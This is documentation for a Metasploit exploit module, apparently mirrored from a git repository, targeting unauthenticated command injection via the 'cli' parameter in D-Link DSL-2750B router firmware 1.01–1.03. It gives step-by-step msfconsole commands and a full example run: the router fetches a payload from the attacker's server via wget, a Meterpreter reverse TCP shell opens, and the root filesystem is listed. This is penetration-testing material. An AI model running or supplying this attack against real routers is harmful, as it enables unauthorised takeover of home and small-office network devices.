adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
382364a3ffdabf8dbdc0f43576a0e6ca4b819b19
metasploit-gs/documentation/modules/exploit/linux/http/dlink_dsl2750b_exec_noauth.md
T
lucyoa 382364a3ff Adding documentation, improving description
2018-05-13 15:04:40 -04:00

2.6 KiB
Raw Blame History

This module dlink_dsl2750b_exec_noauth exploits unauthenticated command injection vulnerability through "cli" parameter. Vulnerable firmwares are 1.01 up to 1.03.

Vulnerable Application

  1. Start msfconsole
  2. Do : use exploit/linux/http/dlink_dsl2750b_exec_noauth
  3. Do : set RHOST [RouterIP]
  4. Do : set PAYLOAD linux/mipsbe/meterpreter/reverse_tcp
  5. Do : run
  6. If router is vulnerable, payload should be dropped via wget method and executed giving us meterpreter session

Example

msf5 > use exploit/linux/http/dlink_dsl2750b_exec_noauth 
msf5 exploit(linux/http/dlink_dsl2750b_exec_noauth) > set RHOST 192.168.1.1
RHOST => 192.168.1.1
msf5 exploit(linux/http/dlink_dsl2750b_exec_noauth) > set PAYLOAD linux/mipsbe/meterpreter/reverse_tcp 
PAYLOAD => linux/mipsbe/meterpreter/reverse_tcp
msf5 exploit(linux/http/dlink_dsl2750b_exec_noauth) > set LHOST eth0
LHOST => eth0
msf5 exploit(linux/http/dlink_dsl2750b_exec_noauth) > set LPORT 5555
LPORT => 5555
msf5 exploit(linux/http/dlink_dsl2750b_exec_noauth) > run

[*] Started reverse TCP handler on 192.168.1.6:5555 
[*] 192.168.1.1:80 Checking target version...
[*] Using URL: http://0.0.0.0:8080/V9GiueD0WW
[*] Local IP: http://192.168.1.6:8080/V9GiueD0WW
[*] Client 192.168.1.1 (Wget) requested /V9GiueD0WW
[*] Sending payload to 192.168.1.1 (Wget)
[*] Sending stage (1104216 bytes) to 192.168.1.1
[*] Meterpreter session 18 opened (192.168.1.6:5555 -> 192.168.1.1:37259) at 2018-05-13 14:58:08 -0400
[*] Command Stager progress - 100.00% done (114/114 bytes)
[*] Server stopped.

meterpreter > ls -la
Listing: /
==========

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
40755/rwxr-xr-x   2554    dir   2013-03-11 07:27:09 -0400  bin
40755/rwxr-xr-x   3       dir   2013-03-11 07:27:54 -0400  data
40755/rwxr-xr-x   2482    dir   2013-03-11 07:27:56 -0400  dev
40755/rwxr-xr-x   779     dir   2013-03-11 07:27:55 -0400  etc
40755/rwxr-xr-x   690     dir   2013-03-11 07:27:55 -0400  lib
100755/rwxr-xr-x  287124  fil   2013-03-11 07:27:55 -0400  linuxrc
40755/rwxr-xr-x   0       dir   1969-12-31 19:00:01 -0500  mnt
40755/rwxr-xr-x   56      dir   2013-03-11 07:13:15 -0400  opt
40555/r-xr-xr-x   0       dir   1969-12-31 19:00:00 -0500  proc
40755/rwxr-xr-x   270     dir   2013-03-11 07:25:43 -0400  sbin
40755/rwxr-xr-x   0       dir   1969-12-31 19:00:00 -0500  sys
40755/rwxr-xr-x   0       dir   2016-10-07 17:20:39 -0400  tmp
40755/rwxr-xr-x   38      dir   2013-03-11 07:23:32 -0400  usr
40755/rwxr-xr-x   0       dir   2016-10-07 17:16:34 -0400  var
40755/rwxr-xr-x   2801    dir   2013-03-11 07:26:34 -0400  webs
Reference in New Issue View Git Blame Copy Permalink